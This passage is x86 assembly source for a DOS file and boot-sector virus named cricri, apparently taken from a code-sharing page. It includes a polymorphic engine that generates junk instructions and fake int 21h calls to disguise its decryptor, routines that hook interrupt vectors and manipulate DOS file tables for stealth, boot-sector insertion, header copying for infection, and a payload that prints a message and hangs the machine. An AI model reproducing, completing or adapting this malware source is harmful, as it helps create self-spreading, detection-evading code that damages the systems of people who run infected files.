📄 cricri.asm
字号:
;Preserve reggies and 8/16 bit
and ax,0011111100000001b
;Or it with addr mode and make it mov
or ax,1100000010001010b
reg_test:
test al,1
jz is_8bit_move_with_reg
;Make source and dest = ax,bx,cx,dx
and ah,11011011b
is_8bit_move_with_reg:
mov bl,ah
and bl,00111000b
;No mov ax, 's please
jz move_with_reg
;Let's see if 2 reggies are same reggies.
mov bh,ah
sal bh,1
sal bh,1
sal bh,1
and bh,00111000b
;Check if reg,reg are same
cmp bh,bl
jz move_with_reg
stosw
ret
;-----------------------------------------------------------------------------
;Modify a mov reg,reg into an xchg reg,reg
;-----------------------------------------------------------------------------
reg_exchange:
;Make a mov reg,reg
call move_with_reg
;But then remove it
dec di
;And take advantage of the fact the opcode is still in ax
dec di
;Was a 16 bit type?
test al,1b
;Yeah go for an 8 bitter
jnz reg_exchange
mov bh,ah
;Is one of reggies ax?
and bh,07h
;Yah so bomb
jz reg_exchange
;Else make it xchg ah,dl etc...
mov al,10000110b
stosw
ret
;-----------------------------------------------------------------------------
;We don't have to watch our stack if we pair up pushes with pops
;so I slapped together this peice of shoddy work to add em.
;-----------------------------------------------------------------------------
do_push_pop:
mov ax,(end_bytes_2-bytes_2)/2
call rand_in_range
add ax,ax
mov bx,ax
;Generate push and pop instruction
mov ax,word ptr cs:[bytes_2+bx]
stosw
ret
;-----------------------------------------------------------------------------
;Generate a random int 21h call.
;-----------------------------------------------------------------------------
do_int_21h:
;Do not generate int 21h calls into boot sectore decryptor
cmp byte ptr cs:[prog_type],"B"
je no_generate_int
;Do not generate int 21h calls into decryption loop
cmp byte ptr cs:[decrypt_pointer],02h
jb no_in_loop
no_generate_int:
ret
no_in_loop:
call get_rnd
;Choose within ah,function or ax,function+subfunction
and al,01h
jz do_int_ax
do_int_ah:
mov ax,end_ah_table-ah_table
call rand_in_range
mov bx,ax
mov ah,byte ptr cs:[ah_table+bx]
;Do not generate same int's in a row
cmp ah,byte ptr cs:[last_int_type]
jz do_int_ah
;Generate mov ah,function
mov byte ptr cs:[last_int_type],ah
mov al,0B4h
stosw
;Generate int 21h
mov ax,021CDh
stosw
ret
do_int_ax:
mov ax,(end_ax_table-ax_table)/2
call rand_in_range
add ax,ax
mov bx,ax
mov ax,word ptr cs:[ax_table+bx]
;Do not generate same int's in a row
cmp ah,byte ptr cs:[last_int_type]
jz do_int_ax
mov byte ptr cs:[last_int_type],ah
;Generate mov ax,function
mov byte ptr es:[di+00h],0B8h
inc di
stosw
;Generate int 21h
mov ax,021CDh
stosw
ret
;-----------------------------------------------------------------------------
;Simple timer based random numbers but with a twist using xor of last one.
;-----------------------------------------------------------------------------
get_rnd:
in ax,40h
xor ax, 0FFFFh
org $-2
Randomize dw 0000h
mov [Randomize],ax
ret
;-----------------------------------------------------------------------------
;A small variation to compensate for lack of randomocity in the
;high byte of 16 bit result returned by get_rnd.
;-----------------------------------------------------------------------------
rand_16:
call get_rnd
mov bl,al
call get_rnd
mov ah,bl
ret
;-----------------------------------------------------------------------------
;Generate a random number betwin 0 and ax.
;-----------------------------------------------------------------------------
rand_in_range:
;Returns a random num between 0 and entry ax
push bx
push dx
xchg ax,bx
call get_rnd
xor dx,dx
div bx
;Remainder in dx
xchg ax,dx
pop dx
pop bx
ret
;----------------------------------------------------------------------------
;Return the al vector in es:bx
;----------------------------------------------------------------------------
get_int:
push ax
xor ah,ah
rol ax,1
rol ax,1
xchg bx,ax
xor ax,ax
mov es,ax
les bx,dword ptr es:[bx+00h]
pop ax
ret
;----------------------------------------------------------------------------
;Set al interrupt vector to ds:dx pointer
;----------------------------------------------------------------------------
set_int:
push ax
push bx
push ds
cli
xor ah,ah
rol ax,1
rol ax,1
xchg ax,bx
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[bx+00h],dx
pop word ptr ds:[bx+02h]
sti
pop ds
pop bx
pop ax
ret
;----------------------------------------------------------------------------
;Print message to screen
;----------------------------------------------------------------------------
print_credits:
;Set VGA video mode 03h
push bp
mov ax,0003h
int 10h
;Print string
mov ax,1301h
mov bx,0002h
mov cx,003Ah
mov dx,0A0Bh
push cs
pop es
pop bp
add bp,offset text_birthday
int 10h
exit_print:
;Infinite loop
jmp exit_print
;----------------------------------------------------------------------------
;Get sft address in es:di
;----------------------------------------------------------------------------
get_sft:
;File handle in bx
push bx
;Get job file table entry to es:di
mov ax,1220h
int 2Fh
jc error_sft
;Exit if handle not opened
xor bx,bx
mov bl,byte ptr es:[di+00h]
cmp bl,0FFh
je error_sft
;Get address of sft entry number bx to es:di
mov ax,1216h
int 2Fh
jc error_sft
pop bx
stc
cmc
ret
;Exit with error
error_sft:
pop bx
stc
ret
;----------------------------------------------------------------------------
;Seek to end of file
;----------------------------------------------------------------------------
seek_end:
call get_sft
mov ax,word ptr es:[di+11h]
mov dx,word ptr es:[di+13h]
mov word ptr es:[di+17h],dx
mov word ptr es:[di+15h],ax
ret
;----------------------------------------------------------------------------
;Seek to beginning
;----------------------------------------------------------------------------
seek_begin:
call get_sft
xor ax,ax
mov word ptr es:[di+17h],ax
mov word ptr es:[di+15h],ax
ret
;----------------------------------------------------------------------------
;Virus CRITICAL ERROR interrupt handler
;----------------------------------------------------------------------------
my_int24h:
sti
;Return error in function
mov al,3
iret
;----------------------------------------------------------------------------
;Save all registers in the stack
;----------------------------------------------------------------------------
push_all:
cli
pop cs:[ret_off]
pushf
push ax
push bx
push cx
push dx
push bp
push si
push di
push es
push ds
push cs:[ret_off]
sti
ret
;----------------------------------------------------------------------------
;Restore all registers from the stack
;----------------------------------------------------------------------------
pop_all:
cli
pop cs:[ret_off]
pop ds
pop es
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
popf
push cs:[ret_off]
sti
ret
;----------------------------------------------------------------------------
;Clear some registers before returning to host
;----------------------------------------------------------------------------
zero_all:
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor di,di
xor si,si
xor bp,bp
ret
;----------------------------------------------------------------------------
;Unhook int 03h and int 24h and clear dos infection switch
;----------------------------------------------------------------------------
unhook_ints:
push ds
push dx
push ax
mov byte ptr cs:[running_sw],"R"
lds dx,dword ptr cs:[old03h]
mov al,03h
call set_int
lds dx,dword ptr cs:[old24h]
mov al,24h
call set_int
pop ax
pop dx
pop ds
ret
;----------------------------------------------------------------------------
;Get position of code inserted into boot sector
;----------------------------------------------------------------------------
get_position:
mov ah,0
mov al,byte ptr es:[bx+01h]
inc ax
inc ax
mov di,bx
add di,ax
ret
;----------------------------------------------------------------------------
;Make a copy of file header
;----------------------------------------------------------------------------
copy_header:
;Copy header to buffer
call push_all
push cs
pop es
mov si,offset file_buffer
mov di,offset old_header
mov cx,0019h
cld
rep movsb
call pop_all
ret
;----------------------------------------------------------------------------
;Polymorphic generator data buffer
;----------------------------------------------------------------------------
ah_table:
;This table contains the int 21h garbage functions
db 00Bh ;Read entry state
db 019h ;Get current drive
db 02Ah ;Get current date
db 02Ch ;Get current time
db 030h ;Get dos version number
db 062h ;Get psp address
end_ah_table:
ax_table:
dw 3300h ;Get break-flag
dw 3700h ;Get line-command separator
dw 5800h ;Get mem concept
dw 5802h ;Get umb insert
dw 6501h ;Get code-page
end_ax_table:
;Push and pop pairs
bytes_2:
push ax
pop dx
push ax
pop bx
push ax
pop cx
push bx
pop dx
push bx
pop cx
push cx
pop bx
push cx
pop dx
end_bytes_2:
;Steps table
step_table:
dw offset do_subroutine
dw offset do_call_garbage
dw offset g_generator
dw offset do_branch
dw offset sub_decryptor
dw offset next_decryptor
dw offset do_push_g_pop
end_step_table:
instruction_table:
dw offset inst_get_delta
dw offset inst_load_counter
dw offset inst_load_pointer
dw offset inst_decrypt_one
dw offset inst_inc_pointer
dw offset inst_dec_loop
end_inst_table:
;Address of every op-code generator
op_table:
dw offset move_with_reg
dw offset move_imm
dw offset reg_exchange
dw offset do_push_pop
dw do_int_21h
end_op_table:
;Misc data
last_fill_type dw 0
last_int_type db 0
last_step_type dw 0000h
last_subroutine dw 0000h
decrypt_sub dw 0000h
address_loop dw 0000h
decrypt_pointer db 00h
address_register db 00h
decrypt_register db 00h
address_seg_1 db 00h
address_seg_2 db 00h
;----------------------------------------------------------------------------
;Virus data buffer
;----------------------------------------------------------------------------
old21h equ this dword
old21h_off dw 0000h
old21h_seg dw 0000h
org21h equ this dword
org21h_off dw 0000h
org21h_seg dw 0000h
old13h equ this dword
old13h_off dw 0000h
old13h_seg dw 0000h
old24h equ this dword
old24h_off dw 0000h
old24h_seg dw 0000h
old03h equ this dword
old03h_off dw 0000h
old03h_seg dw 0000h
read_ptr equ this dword
read_off dw 0000h
read_seg dw 0000h
dos_flag db 00h
prog_type db "C"
running_sw db "R"
stealth_sw db 00h
dos_function dw 0000h
ret_off dw 0000h
today db 00h
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -